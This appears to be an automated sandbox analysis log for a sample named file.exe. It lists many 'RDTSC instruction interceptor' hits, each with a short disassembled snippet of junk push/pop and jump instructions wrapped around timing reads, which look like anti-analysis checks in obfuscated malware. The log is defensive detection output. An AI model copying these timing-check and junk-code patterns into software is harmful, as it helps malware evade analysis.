                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4D994 second address: E4D9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F66B07B4FA6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5184 second address: DF5216 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66B1272F6Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F66B1272F58h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov ebx, dword ptr [ebp+12486209h] 0x0000002d push ebx 0x0000002e pop ecx 0x0000002f add eax, ebx 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F66B1272F58h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b mov edx, 52E54F59h 0x00000050 mov edx, dword ptr [ebp+122D29C6h] 0x00000056 mov dword ptr [ebp+122D2F22h], ebx 0x0000005c nop 0x0000005d js 00007F66B1272F64h 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5216 second address: DF521A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4DC56 second address: E4DC5C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4DC5C second address: E4DC67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F66B07B4FA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4DC67 second address: E4DC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F66B1272F56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4DC73 second address: E4DC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4E792 second address: E4E79A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E52858 second address: E5285C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5285C second address: E5286B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jg 00007F66B1272F56h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E52070 second address: E52095 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F66B07B4FBBh 0x00000008 jc 00007F66B07B4FA6h 0x0000000e jmp 00007F66B07B4FAFh 0x00000013 ja 00007F66B07B4FACh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E521DF second address: E521E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E521E5 second address: E521EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E521EB second address: E521EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E521EF second address: E521F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5AE50 second address: E5AE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5AE56 second address: E5AE5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E590E4 second address: E590EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59286 second address: E5928E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5928E second address: E59299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59299 second address: E592A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F66B07B4FA6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5952F second address: E59540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B1272F5Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59D80 second address: E59D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59D84 second address: E59D91 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E59D91 second address: E59D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5A2BC second address: E5A2E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F65h 0x00000007 jmp 00007F66B1272F5Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5EE87 second address: E5EE8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5EE8B second address: E5EE8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5EE8F second address: E5EE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E032 second address: E5E03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F66B1272F56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E03C second address: E5E04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jo 00007F66B07B4FA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E8AF second address: E5E8B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E8B3 second address: E5E8B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5E8B9 second address: E5E8BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A28C second address: E6A296 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F66B07B4FA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A296 second address: E6A2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d ja 00007F66B1272F56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A2AB second address: E6A2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A3F2 second address: E6A42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B1272F5Eh 0x00000009 jmp 00007F66B1272F69h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F66B1272F56h 0x00000017 jns 00007F66B1272F56h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6A42C second address: E6A435 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6AB50 second address: E6AB54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6B8BC second address: E6B8EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66B07B4FACh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F66B07B4FB9h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6C025 second address: E6C04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jmp 00007F66B1272F60h 0x0000000c pushad 0x0000000d jnp 00007F66B1272F56h 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 ja 00007F66B1272F5Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E727FD second address: E7280B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66B07B4FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7280B second address: E72846 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F68h 0x00000007 push edi 0x00000008 jmp 00007F66B1272F63h 0x0000000d jne 00007F66B1272F56h 0x00000013 pop edi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E72228 second address: E7222C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7222C second address: E72232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E72537 second address: E7255A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FACh 0x00000009 jmp 00007F66B07B4FB3h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E80960 second address: E8096A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F66B1272F56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8096A second address: E80970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E80970 second address: E80976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E80976 second address: E8098C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66B07B4FA6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8098C second address: E809A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F66B1272F5Bh 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E809A1 second address: E809AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E82A1B second address: E82A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E82A25 second address: E82A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F66B07B4FA6h 0x0000000a jmp 00007F66B07B4FAEh 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a ja 00007F66B07B4FA6h 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E825C2 second address: E825CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86787 second address: E867A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B07B4FB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8CE34 second address: E8CE3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8CE3B second address: E8CE5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FB0h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jns 00007F66B07B4FA6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E953F1 second address: E953FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F66B1272F56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E953FD second address: E95414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F66B07B4FAAh 0x0000000c ja 00007F66B07B4FA6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9526E second address: E95275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B5A7 second address: E9B5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FB3h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9BCCE second address: E9BCD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9BCD6 second address: E9BCDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9BE47 second address: E9BE5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F66B1272F56h 0x00000009 jno 00007F66B1272F56h 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9BE5E second address: E9BE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007F66B07B4FD0h 0x0000000d pushad 0x0000000e jmp 00007F66B07B4FB8h 0x00000013 jns 00007F66B07B4FA6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C8CF second address: E9C8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F66B1272F64h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA2AC3 second address: EA2AEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B07B4FAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F66B07B4FB1h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBD1A1 second address: EBD1C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F66B1272F69h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBEE1E second address: EBEE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBEFB1 second address: EBEFE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F66B1272F66h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F66B1272F63h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECEC1F second address: ECEC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECEC23 second address: ECEC36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECEC36 second address: ECEC3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF01C second address: ECF020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF4A0 second address: ECF4B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F66B07B4FA6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF4B0 second address: ECF4B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF4B4 second address: ECF4C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F66B07B4FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF4C4 second address: ECF4CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF4CA second address: ECF4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF5ED second address: ECF5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF5F1 second address: ECF5F7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF5F7 second address: ECF5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF5FD second address: ECF603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF603 second address: ECF607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF607 second address: ECF60B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF8D7 second address: ECF8DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECF8DB second address: ECF8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED149E second address: ED14A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED14A2 second address: ED14A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED14A8 second address: ED14B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3F8C second address: ED3F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4080 second address: ED4086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED7420 second address: ED7424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED7424 second address: ED742E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F66B1272F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED742E second address: ED745F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66B07B4FB5h 0x00000008 jmp 00007F66B07B4FB2h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D031F second address: 50D0325 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0325 second address: 50D0329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
